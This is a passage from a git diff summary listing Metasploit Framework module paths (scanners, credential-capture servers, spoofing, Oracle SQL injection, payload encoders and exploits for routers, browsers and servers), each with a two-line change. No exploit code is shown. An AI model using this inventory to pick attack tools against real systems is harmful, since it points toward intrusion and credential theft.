| 2 +- modules/auxiliary/scanner/mysql/mysql_version.rb | 2 +- modules/auxiliary/scanner/natpmp/natpmp_portscan.rb | 2 +- modules/auxiliary/scanner/nessus/nessus_ntp_login.rb | 2 +- modules/auxiliary/scanner/nessus/nessus_rest_login.rb | 2 +- modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb | 2 +- modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb | 2 +- modules/auxiliary/scanner/netbios/nbname.rb | 2 +- modules/auxiliary/scanner/netbios/nbname_probe.rb | 2 +- modules/auxiliary/scanner/nexpose/nexpose_api_login.rb | 2 +- modules/auxiliary/scanner/nfs/nfsmount.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_gsad_login.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_omp_login.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_otp_login.rb | 2 +- modules/auxiliary/scanner/oracle/emc_sid.rb | 2 +- modules/auxiliary/scanner/oracle/isqlplus_login.rb | 2 +- modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb | 2 +- modules/auxiliary/scanner/oracle/oracle_hashdump.rb | 2 +- modules/auxiliary/scanner/oracle/oracle_login.rb | 2 +- modules/auxiliary/scanner/oracle/sid_brute.rb | 2 +- modules/auxiliary/scanner/oracle/sid_enum.rb | 2 +- modules/auxiliary/scanner/oracle/spy_sid.rb | 2 +- modules/auxiliary/scanner/oracle/tnslsnr_version.rb | 2 +- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_login.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_version.rb | 2 +- modules/auxiliary/scanner/portmap/portmap_amp.rb | 2 +- modules/auxiliary/scanner/portscan/ack.rb | 2 +- modules/auxiliary/scanner/portscan/ftpbounce.rb | 2 +- modules/auxiliary/scanner/portscan/syn.rb | 2 +- modules/auxiliary/scanner/portscan/tcp.rb | 2 +- modules/auxiliary/scanner/portscan/xmas.rb | 2 +- .../scanner/postgres/postgres_dbname_flag_injection.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_hashdump.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_login.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_schemadump.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_version.rb | 2 +- modules/auxiliary/scanner/quake/server_info.rb | 2 +- modules/auxiliary/scanner/rdp/ms12_020_check.rb | 2 +- modules/auxiliary/scanner/redis/file_upload.rb | 2 +- modules/auxiliary/scanner/redis/redis_server.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_recv.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_send.rb | 2 +- modules/auxiliary/scanner/rservices/rexec_login.rb | 2 +- modules/auxiliary/scanner/rservices/rlogin_login.rb | 2 +- modules/auxiliary/scanner/rservices/rsh_login.rb | 2 +- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- modules/auxiliary/scanner/sap/sap_router_portscanner.rb | 2 +- modules/auxiliary/scanner/scada/digi_addp_reboot.rb | 2 +- modules/auxiliary/scanner/scada/digi_addp_version.rb | 2 +- .../auxiliary/scanner/scada/digi_realport_serialport_scan.rb | 2 +- modules/auxiliary/scanner/scada/digi_realport_version.rb | 2 +- modules/auxiliary/scanner/scada/koyo_login.rb | 2 +- modules/auxiliary/scanner/scada/modbus_findunitid.rb | 2 +- modules/auxiliary/scanner/scada/modbusclient.rb | 2 +- modules/auxiliary/scanner/scada/modbusdetect.rb | 2 +- modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb | 2 +- modules/auxiliary/scanner/sip/enumerator.rb | 2 +- modules/auxiliary/scanner/sip/enumerator_tcp.rb | 2 +- modules/auxiliary/scanner/sip/options.rb | 2 +- modules/auxiliary/scanner/sip/options_tcp.rb | 2 +- modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb | 2 +- modules/auxiliary/scanner/smb/pipe_auditor.rb | 2 +- modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 2 +- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 2 +- modules/auxiliary/scanner/smb/smb2.rb | 2 +- modules/auxiliary/scanner/smb/smb_enum_gpp.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumshares.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumusers.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 2 +- modules/auxiliary/scanner/smb/smb_login.rb | 2 +- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- modules/auxiliary/scanner/smb/smb_uninit_cred.rb | 2 +- modules/auxiliary/scanner/smb/smb_version.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_enum.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_relay.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_version.rb | 2 +- modules/auxiliary/scanner/snmp/aix_version.rb | 2 +- modules/auxiliary/scanner/snmp/arris_dg950.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 2 +- modules/auxiliary/scanner/snmp/cisco_config_tftp.rb | 2 +- modules/auxiliary/scanner/snmp/cisco_upload_file.rb | 2 +- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/sbg6580_enum.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enum.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumshares.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumusers.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_login.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_set.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/karaf_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 2 +- modules/auxiliary/scanner/steam/server_info.rb | 2 +- modules/auxiliary/scanner/telephony/wardial.rb | 2 +- modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_login.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_version.rb | 2 +- modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/netdecision_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/tftpbrute.rb | 2 +- modules/auxiliary/scanner/udp_scanner_template.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_amp.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 2 +- modules/auxiliary/scanner/vmware/esx_fingerprint.rb | 2 +- modules/auxiliary/scanner/vmware/vmauthd_login.rb | 2 +- modules/auxiliary/scanner/vmware/vmauthd_version.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_users.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_vms.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_host_details.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_http_login.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb | 2 +- .../auxiliary/scanner/vmware/vmware_update_manager_traversal.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_login.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 2 +- modules/auxiliary/scanner/voice/recorder.rb | 2 +- modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb | 2 +- modules/auxiliary/scanner/vxworks/wdbrpc_version.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_login.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 2 +- modules/auxiliary/scanner/x11/open_x11.rb | 2 +- modules/auxiliary/server/android_browsable_msf_launch.rb | 2 +- modules/auxiliary/server/android_mercury_parseuri.rb | 2 +- modules/auxiliary/server/browser_autopwn.rb | 2 +- modules/auxiliary/server/browser_autopwn2.rb | 2 +- modules/auxiliary/server/capture/drda.rb | 2 +- modules/auxiliary/server/capture/ftp.rb | 2 +- modules/auxiliary/server/capture/http.rb | 2 +- modules/auxiliary/server/capture/http_basic.rb | 2 +- modules/auxiliary/server/capture/http_javascript_keylogger.rb | 2 +- modules/auxiliary/server/capture/http_ntlm.rb | 2 +- modules/auxiliary/server/capture/imap.rb | 2 +- modules/auxiliary/server/capture/mssql.rb | 2 +- modules/auxiliary/server/capture/mysql.rb | 2 +- modules/auxiliary/server/capture/pop3.rb | 2 +- modules/auxiliary/server/capture/postgresql.rb | 2 +- modules/auxiliary/server/capture/printjob_capture.rb | 2 +- modules/auxiliary/server/capture/sip.rb | 2 +- modules/auxiliary/server/capture/smb.rb | 2 +- modules/auxiliary/server/capture/smtp.rb | 2 +- modules/auxiliary/server/capture/telnet.rb | 2 +- modules/auxiliary/server/capture/vnc.rb | 2 +- modules/auxiliary/server/dhclient_bash_env.rb | 2 +- modules/auxiliary/server/dhcp.rb | 2 +- modules/auxiliary/server/dns/spoofhelper.rb | 2 +- modules/auxiliary/server/fakedns.rb | 2 +- modules/auxiliary/server/ftp.rb | 2 +- modules/auxiliary/server/http_ntlmrelay.rb | 2 +- modules/auxiliary/server/icmp_exfil.rb | 2 +- modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 2 +- modules/auxiliary/server/ms15_134_mcl_leak.rb | 2 +- modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb | 2 +- modules/auxiliary/server/openssl_heartbeat_client_memory.rb | 2 +- modules/auxiliary/server/pxeexploit.rb | 2 +- modules/auxiliary/server/socks4a.rb | 2 +- modules/auxiliary/server/socks_unc.rb | 2 +- modules/auxiliary/server/tftp.rb | 2 +- modules/auxiliary/server/webkit_xslt_dropper.rb | 2 +- modules/auxiliary/server/wget_symlink_file_write.rb | 2 +- modules/auxiliary/server/wpad.rb | 2 +- modules/auxiliary/sniffer/psnuffle.rb | 2 +- modules/auxiliary/spoof/arp/arp_poisoning.rb | 2 +- modules/auxiliary/spoof/cisco/cdp.rb | 2 +- modules/auxiliary/spoof/cisco/dtp.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 2 +- modules/auxiliary/spoof/dns/compare_results.rb | 2 +- modules/auxiliary/spoof/llmnr/llmnr_response.rb | 2 +- modules/auxiliary/spoof/nbns/nbns_response.rb | 2 +- modules/auxiliary/spoof/replay/pcap_replay.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb | 2 +- .../sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_export_extension.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_open.rb | 2 +- modules/auxiliary/sqli/oracle/droptable_trigger.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb | 2 +- modules/auxiliary/sqli/oracle/lt_compressworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb | 2 +- modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_removeworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb | 2 +- modules/auxiliary/voip/asterisk_login.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_call_forward.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_speed_dials.rb | 2 +- modules/auxiliary/voip/sip_deregister.rb | 2 +- modules/auxiliary/voip/sip_invite_spoof.rb | 2 +- modules/auxiliary/voip/telisca_ips_lock_control.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_query.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_zeus.rb | 2 +- modules/auxiliary/vsploit/pii/email_pii.rb | 2 +- modules/auxiliary/vsploit/pii/web_pii.rb | 2 +- modules/encoders/cmd/echo.rb | 2 +- modules/encoders/cmd/generic_sh.rb | 2 +- modules/encoders/cmd/ifs.rb | 2 +- modules/encoders/cmd/perl.rb | 2 +- modules/encoders/cmd/powershell_base64.rb | 2 +- modules/encoders/cmd/printf_php_mq.rb | 2 +- modules/encoders/generic/eicar.rb | 2 +- modules/encoders/generic/none.rb | 2 +- modules/encoders/mipsbe/byte_xori.rb | 2 +- modules/encoders/mipsbe/longxor.rb | 2 +- modules/encoders/mipsle/byte_xori.rb | 2 +- modules/encoders/mipsle/longxor.rb | 2 +- modules/encoders/php/base64.rb | 2 +- modules/encoders/ppc/longxor.rb | 2 +- modules/encoders/ppc/longxor_tag.rb | 2 +- modules/encoders/sparc/longxor_tag.rb | 2 +- modules/encoders/x64/xor.rb | 2 +- modules/encoders/x86/add_sub.rb | 2 +- modules/encoders/x86/alpha_mixed.rb | 2 +- modules/encoders/x86/alpha_upper.rb | 2 +- modules/encoders/x86/avoid_underscore_tolower.rb | 2 +- modules/encoders/x86/avoid_utf8_tolower.rb | 2 +- modules/encoders/x86/call4_dword_xor.rb | 2 +- modules/encoders/x86/context_cpuid.rb | 2 +- modules/encoders/x86/context_stat.rb | 2 +- modules/encoders/x86/context_time.rb | 2 +- modules/encoders/x86/countdown.rb | 2 +- modules/encoders/x86/fnstenv_mov.rb | 2 +- modules/encoders/x86/jmp_call_additive.rb | 2 +- modules/encoders/x86/nonalpha.rb | 2 +- modules/encoders/x86/nonupper.rb | 2 +- modules/encoders/x86/opt_sub.rb | 2 +- modules/encoders/x86/shikata_ga_nai.rb | 2 +- modules/encoders/x86/single_static_bit.rb | 2 +- modules/encoders/x86/unicode_mixed.rb | 2 +- modules/encoders/x86/unicode_upper.rb | 2 +- modules/exploits/aix/rpc_cmsd_opcode21.rb | 2 +- modules/exploits/aix/rpc_ttdbserverd_realpath.rb | 2 +- modules/exploits/android/adb/adb_server_exec.rb | 2 +- modules/exploits/android/browser/samsung_knox_smdm_url.rb | 2 +- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- .../android/fileformat/adobe_reader_pdf_js_interface.rb | 2 +- modules/exploits/apple_ios/browser/safari_libtiff.rb | 2 +- modules/exploits/apple_ios/email/mobilemail_libtiff.rb | 2 +- modules/exploits/apple_ios/ssh/cydia_default_ssh.rb | 2 +- modules/exploits/bsdi/softcart/mercantec_softcart.rb | 2 +- modules/exploits/dialup/multi/login/manyargs.rb | 2 +- modules/exploits/firefox/local/exec_shellcode.rb | 2 +- modules/exploits/freebsd/ftp/proftp_telnet_iac.rb | 2 +- modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- modules/exploits/freebsd/samba/trans2open.rb | 2 +- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 2 +- modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb | 2 +- modules/exploits/hpux/lpd/cleanup_exec.rb | 2 +- modules/exploits/irix/lpd/tagprinter_exec.rb | 2 +- modules/exploits/linux/antivirus/escan_password_exec.rb | 2 +- modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb | 2 +- modules/exploits/linux/ftp/proftp_sreplace.rb | 2 +- modules/exploits/linux/ftp/proftp_telnet_iac.rb | 2 +- modules/exploits/linux/games/ut2004_secure.rb | 2 +- modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb | 2 +- modules/exploits/linux/http/airties_login_cgi_bof.rb | 2 +- modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb | 2 +- modules/exploits/linux/http/alienvault_sqli_exec.rb | 2 +- modules/exploits/linux/http/astium_sqli_upload.rb | 2 +- modules/exploits/linux/http/belkin_login_bof.rb | 2 +- modules/exploits/linux/http/centreon_sqli_exec.rb | 2 +- modules/exploits/linux/http/ddwrt_cgibin_exec.rb | 2 +- modules/exploits/linux/http/dlink_authentication_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_command_php_exec_noauth.rb | 2 +- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb | 2 +- modules/exploits/linux/http/dlink_dir300_exec_telnet.rb | 2 +- modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb | 2 +- modules/exploits/linux/http/dlink_dir615_up_exec.rb | 2 +- modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb | 2 +- modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 2 +- modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb | 2 +- modules/exploits/linux/http/dlink_upnp_exec_noauth.rb | 2 +- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 2 +- modules/exploits/linux/http/dreambox_openpli_shell.rb | 2 +- modules/exploits/linux/http/esva_exec.rb | 2 +- modules/exploits/linux/http/f5_icall_cmd.rb | 2 +- modules/exploits/linux/http/f5_icontrol_exec.rb | 2 +- modules/exploits/linux/http/fritzbox_echo_exec.rb | 2 +- modules/exploits/linux/http/gitlist_exec.rb | 2 +- modules/exploits/linux/http/gpsd_format_string.rb | 2 +- modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb | 2 +- modules/exploits/linux/http/hp_system_management.rb | 2 +- modules/exploits/linux/http/kloxo_sqli.rb | 2 +- modules/exploits/linux/http/lifesize_uvc_ping_rce.rb | 2 +- modules/exploits/linux/http/linksys_apply_cgi.rb | 2 +- modules/exploits/linux/http/linksys_e1500_apply_exec.rb | 2 +- modules/exploits/linux/http/linksys_themoon_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb | 2 +- modules/exploits/linux/http/multi_ncc_ping_exec.rb | 2 +- modules/exploits/linux/http/mutiny_frontend_upload.rb | 2 +- modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb | 2 +- modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb | 2 +- modules/exploits/linux/http/netgear_readynas_exec.rb | 2 +- modules/exploits/linux/http/openfiler_networkcard_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_sqli.rb | 2 +- modules/exploits/linux/http/peercast_url.rb | 2 +- modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb | 2 +- modules/exploits/linux/http/pineapp_livelog_exec.rb | 2 +- modules/exploits/linux/http/pineapp_test_li_conn_exec.rb | 2 +- modules/exploits/linux/http/piranha_passwd_exec.rb | 2 +- modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 2 +- modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb | 2 +- modules/exploits/linux/http/smt_ipmi_close_window_bof.rb | 2 +- modules/exploits/linux/http/sophos_wpa_iface_exec.rb | 2 +- modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_exec.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_file_upload.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_lfi.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_restore.rb | 2 +- .../exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb | 2 +- modules/exploits/linux/http/vap2500_tools_command_exec.rb | 2 +- modules/exploits/linux/http/vcms_upload.rb | 2 +- modules/exploits/linux/http/wanem_exec.rb | 2 +- modules/exploits/linux/http/webcalendar_settings_exec.rb | 2 +- modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/linux/http/zabbix_sqli.rb | 2 +- modules/exploits/linux/http/zen_load_balancer_exec.rb | 2 +- modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb | 2 +- modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb | 2 +- modules/exploits/linux/ids/snortbopre.rb | 2 +- modules/exploits/linux/imap/imap_uw_lsub.rb | 2 +- modules/exploits/linux/misc/accellion_fta_mpipe2.rb | 2 +- modules/exploits/linux/misc/drb_remote_codeexec.rb | 2 +- modules/exploits/linux/misc/gld_postfix.rb | 2 +- modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb | 2 +- modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb | 2 +- modules/exploits/linux/misc/hp_vsa_login_bof.rb | 2 +- modules/exploits/linux/misc/hplip_hpssd_exec.rb | 2 +- modules/exploits/linux/misc/ib_inet_connect.rb | 2 +- modules/exploits/linux/misc/ib_jrd8_create_database.rb | 2 +- modules/exploits/linux/misc/ib_open_marker_file.rb | 2 +- modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 2 +- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- modules/exploits/linux/misc/lprng_format_string.rb | 2 +- modules/exploits/linux/misc/mongod_native_helper.rb | 2 +- modules/exploits/linux/misc/nagios_nrpe_arguments.rb | 2 +- modules/exploits/linux/misc/netsupport_manager_agent.rb | 2 +- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- modules/exploits/linux/misc/sercomm_exec.rb | 2 +- modules/exploits/linux/misc/zabbix_server_exec.rb | 2 +- modules/exploits/linux/mysql/mysql_yassl_getname.rb | 2 +- modules/exploits/linux/mysql/mysql_yassl_hello.rb | 2 +- modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb | 2 +- modules/exploits/linux/postgres/postgres_payload.rb | 2 +- modules/exploits/linux/pptp/poptop_negative_read.rb | 2 +- modules/exploits/linux/proxy/squid_ntlm_authenticate.rb | 2 +- modules/exploits/linux/samba/chain_reply.rb | 2 +- modules/exploits/linux/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/linux/samba/setinfopolicy_heap.rb | 2 +- modules/exploits/linux/samba/trans2open.rb | 2 +- modules/exploits/linux/smtp/exim4_dovecot_exec.rb | 2 +- modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- modules/exploits/linux/ssh/f5_bigip_known_privkey.rb | 2 +- .../linux/ssh/loadbalancerorg_enterprise_known_privkey.rb | 2 +- modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb | 2 +- modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb | 2 +- modules/exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- modules/exploits/linux/telnet/telnet_encrypt_keyid.rb | 2 +- modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb | 2 +- modules/exploits/linux/upnp/miniupnpd_soap_bof.rb | 2 +- modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 2 +- modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 2 +- .../multi/browser/adobe_flash_net_connection_confusion.rb | 2 +- .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +- modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb | 2 +- .../exploits/multi/browser/adobe_flash_shader_drawing_fill.rb | 2 +- .../exploits/multi/browser/adobe_flash_shader_job_overflow.rb | 2 +- .../exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb | 2 +- modules/exploits/multi/browser/firefox_escape_retval.rb | 2 +- .../multi/browser/firefox_pdfjs_privilege_escalation.rb | 2 +- modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 2 +- modules/exploits/multi/browser/firefox_proxy_prototype.rb | 2 +- modules/exploits/multi/browser/firefox_queryinterface.rb | 2 +- modules/exploits/multi/browser/firefox_svg_plugin.rb | 2 +- .../multi/browser/firefox_tostring_console_injection.rb | 2 +- modules/exploits/multi/browser/firefox_webidl_injection.rb | 2 +- .../exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb | 2 +- modules/exploits/multi/browser/itms_overflow.rb | 2 +- modules/exploits/multi/browser/java_atomicreferencearray.rb | 2 +- modules/exploits/multi/browser/java_calendar_deserialize.rb | 2 +- modules/exploits/multi/browser/java_getsoundbank_bof.rb | 2 +- modules/exploits/multi/browser/java_jre17_driver_manager.rb | 2 +- modules/exploits/multi/browser/java_jre17_exec.rb | 2 +- .../browser/java_jre17_glassfish_averagerangestatisticimpl.rb | 2 +- modules/exploits/multi/browser/java_jre17_jaxws.rb | 2 +- modules/exploits/multi/browser/java_jre17_jmxbean.rb | 2 +- modules/exploits/multi/browser/java_jre17_jmxbean_2.rb | 2 +- modules/exploits/multi/browser/java_jre17_method_handle.rb | 2 +- modules/exploits/multi/browser/java_jre17_provider_skeleton.rb | 2 +- modules/exploits/multi/browser/java_jre17_reflection_types.rb | 2 +- modules/exploits/multi/browser/java_rhino.rb | 2 +- modules/exploits/multi/browser/java_rmi_connection_impl.rb | 2 +- modules/exploits/multi/browser/java_setdifficm_bof.rb | 2 +- modules/exploits/multi/browser/java_signed_applet.rb | 2 +- modules/exploits/multi/browser/java_storeimagearray.rb | 2 +- modules/exploits/multi/browser/java_trusted_chain.rb | 2 +- modules/exploits/multi/browser/java_verifier_field_access.rb | 2 +- modules/exploits/multi/browser/mozilla_compareto.rb | 2 +- modules/exploits/multi/browser/mozilla_navigatorjava.rb | 2 +- modules/exploits/multi/browser/opera_configoverwrite.rb | 2 +- modules/exploits/multi/browser/opera_historysearch.rb | 2 +- modules/exploits/multi/browser/qtjava_pointer.rb | 2 +- modules/exploits/multi/elasticsearch/script_mvel_rce.rb | 2 +- modules/exploits/multi/elasticsearch/search_groovy_script.rb | 2 +- modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb | 2 +- modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb | 2 +- modules/exploits/multi/fileformat/maple_maplet.rb | 2 +- .../exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb | 2 +- modules/exploits/multi/fileformat/peazip_command_injection.rb | 2 +- modules/exploits/multi/ftp/wuftpd_site_exec_format.rb | 2 +- modules/exploits/multi/gdb/gdb_server_exec.rb | 2 +- modules/exploits/multi/handler.rb | 2 +- modules/exploits/multi/http/activecollab_chat.rb | 2 +- modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- modules/exploits/multi/http/apache_roller_ognl_injection.rb | 2 +- modules/exploits/multi/http/apprain_upload_exec.rb | 2 +- modules/exploits/multi/http/atutor_sqli.rb | 2 +- modules/exploits/multi/http/auxilium_upload_exec.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 2 +- modules/exploits/multi/http/bolt_file_upload.rb | 2 +- modules/exploits/multi/http/cisco_dcnm_upload.rb | 2 +- modules/exploits/multi/http/coldfusion_rds.rb | 2 +- modules/exploits/multi/http/cuteflow_upload_exec.rb | 2 +- modules/exploits/multi/http/dexter_casinoloader_exec.rb | 2 +- modules/exploits/multi/http/drupal_drupageddon.rb | 2 +- modules/exploits/multi/http/eaton_nsm_code_exec.rb | 2 +- modules/exploits/multi/http/eventlog_file_upload.rb | 2 +- modules/exploits/multi/http/extplorer_upload_exec.rb | 2 +- modules/exploits/multi/http/familycms_less_exec.rb | 2 +- 